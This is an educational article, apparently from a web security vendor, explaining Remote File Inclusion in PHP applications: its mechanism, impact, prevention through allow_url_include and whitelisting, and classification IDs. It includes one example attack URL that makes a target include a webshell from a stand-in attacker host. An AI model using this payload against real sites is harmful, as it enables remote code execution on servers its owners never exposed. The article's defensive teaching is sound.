What is the Remote File Inclusion vulnerability?

Category: Web Security Readings - Last Updated: Thu, 04 Jul 2019 - by Netsparker Security Team

Introduction to the Remote File Inclusion (RFI) Vulnerability

A remote file inclusion (RFI) occurs when a file from a remote web server is inserted into a web page. This can be done on purpose to display content from a remote web application. But, it can also happen by accident, due to a misconfiguration of the respective programming language, wchich can lead to a RFI attack.

What is the Remote File Inclusion vulnerability?

Even though this kind of file inclusion can occur in almost every kind of web application, those written in PHP code are more likely to to be vulnerable to Remote File Inclusion attacks, because PHP provides native functions that allow the inclusion of remote files. Other languages usually require a workaround to imitate this behavior.

How Does Remote File Inclusion work?

In order to include a remote file you have to add a string with the url of the file to an Include function of the respective language (for example, PHP). Then the web server of the website under attack makes a request to the remote file, fetches its contents and includes it on the web page serving the content. It is then processed by the parser of the language.

How Can a Web Application Be Vulnerable to a Remote File Inclusion?

By default, RFI is often disabled. PHP, for example, introduced the php.ini configuration option in 5.2.0 to disable RFI. There are only a few scenarios where it is actually needed in PHP code. Sometimes developers enabled it on purpose, and sometimes it is enabled by default on older versions of the server side programming language.

Usually developers enable such functionality to allow them to include a local file, but without proper input validation, it is also possible to fetch data from a remote server. Therefore, in most cases when such functionality is enabled, the web application becomes vulnerable to both Remote File Inclusion and Local File Inclusion (LFI).

Exploiting a Remote File Inclusion Vulnerability

Consider a developer who wants to include a local file depending on the GET parameter page. They have different php files such as contact.php, main.php and about.php, all of which provide different functionality to the website. Each file can be called using the following request that is sent to the index.php file:

https://example.com/index.php?page=contact.php

While the developer expects that only files inside that folder are included, it might be possible for an attacker to include files from another directory (LFI) or even from a completely different web server (RFI), especially if there is no whitelist of files. In fact, without a whitelist (of permitted files), the attacker is able to change the filepath to the programming language’s Include function. The attacker can include a local file, but in a typical attack, they change the path to a file that resides on a server they control. That way, that attacked can easily write malicious code inside a file, without having to poison logs or otherwise inject code inside the web server (which is what is required in the case of a Local File Inclusion).

An attack might look like this:

https://example.com/index.php?page=https://attacker.com/uploads/webshell.txt

What is the Impact of an Exploited Remote File Inclusion?

Impact may differ depending on the type of the remote file inclusion attack and the execution permissions of the web server user. Any included source code in malicious files could be executed by the web server with the privileges of the current the web server user, making it possible to execute arbitrary code that could lead to issues such as sensitive information disclosure and code execution at OS level. If the web server user has administrative privileges on the server, the problem goes beyond web application security. It can lead to a full system compromise.

How to Prevent Remote File Inclusion Vulnerabilities

To prevent exploitation of the RFI vulnerability,  ensure that you disable the remote inclusion feature in your programming languages' configuration, especially if you do not need it. In PHP, you can set allow_url_include to '0'. You should also validate user input before passing it to an Include function. Lack of validation of user input is the cause of many vulnerabilities, such as Cross-site Scripting (XSS), SQL Injection, Local File Inclusion (LFI vulnerability) and many others. 

If you really have to enable remote file inclusions, then work with a whitelist of files that are allowed to be included on your web application.

Vulnerability Classification and Severity Table

Classification ID / Severity
PCI v3.1 6.5.1
PCI v3.2 6.5.1
OWASP 2013 A1
CWE 98
CAPEC 193
WASC 5
HIPAA 164.306(a)
CVSS:3.0
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
Netsparker Critical
Netsparker

Keep up to date with web security news from Netsparker